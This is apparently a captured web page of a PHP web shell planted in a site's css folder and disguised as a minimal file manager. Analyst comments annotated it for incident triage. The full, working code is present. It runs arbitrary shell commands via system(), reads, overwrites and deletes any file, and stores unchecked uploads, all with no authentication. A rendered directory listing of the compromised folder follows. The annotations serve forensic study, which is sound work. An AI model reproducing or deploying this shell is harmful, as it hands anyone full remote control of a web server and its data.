Edit: /home/ratkomit/public_html/css/fm.php
<?php /* Minimal PHP File Manager */
// Analyst notes. The code below is unchanged apart from line breaks between
// top-level statements.
//
// Capabilities, each selected purely by the presence of a request parameter:
//   GET  d             directory to list (default '.')
//   GET  c + POST cmd  run a shell command via system()
//   GET  edit          show a file in a textarea; POST content overwrites it
//   GET  view          print a file's contents
//   GET  del           unlink a regular file
//   FILES up           store an uploaded file in the current directory
//
// No authentication, session, token or source-address check appears anywhere in
// the script, so every action is available to any client that can request it.
// For triage: the GET keys above appear in the request line of web-server access
// logs; the POST fields (cmd, content, up) are usually not logged by default, so
// commands that were run may not be recoverable from access logs alone.

// Resolve the requested directory to a canonical absolute path.
$pwd=realpath(isset($_GET['d'])?$_GET['d']:'.');
// The "root" used for confinement is the filesystem root itself.
$root=realpath('/');
// Prefix test against $root. Because $root is the filesystem root, every path
// realpath() resolves passes; in effect this only falls back to $root when
// realpath() failed, so the listing is not confined to the web directory.
if(strpos($pwd,$root)!==0) $pwd=$root;
// Page header and inline stylesheet (static markup, no request data).
echo '<!doctype html><html><head><meta charset=utf-8><title>FM</title><style>body{font-family:monospace;margin:20px;background:#111;color:#0f0}a{color:#0ff}th{text-align:left}table{width:100%}td{border-bottom:1px solid #333;padding:4px}tr:hover{background:#222}pre{background:#000;padding:10px;overflow:auto}input,textarea{background:#222;color:#0f0;border:1px solid #0f0;padding:5px}</style></head><body>';
// Command panel: the POSTed cmd string goes to system() verbatim with stderr
// redirected into stdout, and the output is echoed inside <pre> without HTML
// escaping. Execution happens with the privileges of the PHP process.
if(isset($_GET['c'])){echo '<h3>CMD</h3><form method=post action="?c=1&d='.urlencode($pwd).'"><input type=text name=cmd size=80 autofocus><input type=submit value=Exec></form>';if(isset($_POST['cmd'])){echo '<pre>';system($_POST['cmd'].' 2>&1');echo '</pre>';}}
// Editor: reads the target file into a textarea, then, if content was POSTed,
// overwrites the file with it. The same root-prefix test applies, so any
// resolvable path writable by the PHP process can be modified. The textarea is
// rendered before the write, so it shows the pre-save contents.
if(isset($_GET['edit'])){$f=realpath($_GET['edit']);if(strpos($f,$root)===0){echo '<h3>Edit: '.htmlspecialchars($f).'</h3><form method=post action="?edit='.urlencode($f).'&d='.urlencode($pwd).'"><textarea name=content rows=30 cols=120>'.htmlspecialchars(file_get_contents($f)).'</textarea><br><input type=submit value=Save></form>';if(isset($_POST['content'])){file_put_contents($f,$_POST['content']);echo '<b>Saved</b>';}}}
// Viewer: prints any resolvable, readable file (HTML-escaped).
if(isset($_GET['view'])){$f=realpath($_GET['view']);if(strpos($f,$root)===0) echo '<h3>'.htmlspecialchars($f).'</h3><pre>'.htmlspecialchars(file_get_contents($f)).'</pre>';}
// Delete: removes the target if it is a regular file. Triggered by a plain GET
// request, so a "del" key in an access-log request line corresponds to a
// deletion attempt.
if(isset($_GET['del'])){$f=realpath($_GET['del']);if(strpos($f,$root)===0 && is_file($f)){unlink($f);echo '<b>Deleted</b> ';}}
// Upload: stores the file under its client-supplied base name in $pwd. There is
// no extension, type or size check; the name is echoed back without escaping.
if(isset($_FILES['up'])){$t=$_FILES['up']['tmp_name'];$n=basename($_FILES['up']['name']);move_uploaded_file($t,$pwd.'/'.$n);echo '<b>Uploaded '.$n.'</b> ';}
// Current directory heading, upload form and navigation links.
echo '<h3>'.htmlspecialchars($pwd).'</h3>';
echo '<form method=post enctype=multipart/form-data action="?d='.urlencode($pwd).'"><input type=file name=up><input type=submit value=Upload></form>';
echo '<a href="?d='.urlencode(dirname($pwd)).'">[UP]</a> <a href="?c=1&d='.urlencode($pwd).'">[CMD]</a>';
// Directory listing: one row per scandir() entry except '.', showing the size
// (or DIR), the last four octal digits of fileperms(), and View/Edit/Delete
// links. Entry names ($n) are written into the HTML without escaping, so a
// captured copy of this output should be treated as untrusted markup when it
// is opened in a browser.
echo '<table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Action</th></tr>';
foreach(scandir($pwd) as $n){if($n==='.') continue;$p=$pwd.'/'.$n;$s=is_dir($p)?'DIR':filesize($p);$m=substr(sprintf('%o',fileperms($p)),-4);echo '<tr><td>'.(is_dir($p)?'<a href="?d='.urlencode($p).'">'.$n.'/</a>':$n).'</td><td>'.$s.'</td><td>'.$m.'</td><td><a href="?view='.urlencode($p).'&d='.urlencode($pwd).'">V</a> <a href="?edit='.urlencode($p).'&d='.urlencode($pwd).'">E</a> <a href="?del='.urlencode($p).'&d='.urlencode($pwd).'" onclick="return confirm(\'Del?\')">D</a></td></tr>';}
echo '</table></body></html>';
?>
/home/ratkomit/public_html/css
[UP]
[CMD]
Name
Size
Perm
Action
../
DIR
0750
V
E
D
.DS_Store
6148
0644
V
E
D
README.md
404
0644
V
E
D
fm.php
2604
0644
V
E
D
fonts.php
4024
0644
V
E
D
style.css.sorry
5824
0644
V
E
D